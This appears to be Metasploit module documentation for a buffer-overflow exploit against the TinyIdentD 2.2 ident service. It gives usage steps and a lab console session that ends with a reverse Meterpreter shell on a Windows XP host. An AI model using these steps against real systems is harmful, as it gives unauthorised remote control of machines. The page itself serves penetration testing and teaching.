1.8 KiB
1.8 KiB
Vulnerable Application
This module exploits a stack based buffer overflow in TinyIdentD version 2.2.
If we send a long string to the ident service we can overwrite the return address and execute arbitrary code. Credit to Maarten Boone.
Download:
Verification Steps
- Start
msfconsole use exploit/windows/misc/tiny_identd_overflowset RHOSTS <rhost>set TARGET <target>run- You should get a new session
Options
Scenarios
TinyIdentD 2.2 on Windows XP SP0 - English (x86)
msf5 > use exploit/windows/misc/tiny_identd_overflow
msf5 exploit(windows/misc/tiny_identd_overflow) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
1 Windows 2000 Server SP4 - English
2 Windows 2000 Pro All - English
3 Windows 2000 Pro All - Italian
4 Windows 2000 Pro All - French
5 Windows XP SP0/1 - English
6 Windows XP SP2 - English
7 Windows XP SP2 - Italian
msf5 exploit(windows/misc/tiny_identd_overflow) > set target 5
target => 5
msf5 exploit(windows/misc/tiny_identd_overflow) > set rhosts 172.16.191.140
rhosts => 172.16.191.140
msf5 exploit(windows/misc/tiny_identd_overflow) > run
[*] Started reverse TCP handler on 172.16.191.165:4444
[*] 172.16.191.140:113 - Trying Windows XP SP0/1 - English using address at 0x71aa1a97 ...
[*] Sending stage (176195 bytes) to 172.16.191.140
[*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.140:1040) at 2020-05-23 00:00:56 -0400
meterpreter > sysinfo
Computer : WINXP
OS : Windows XP (5.1 Build 2600).
Architecture : x86
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter >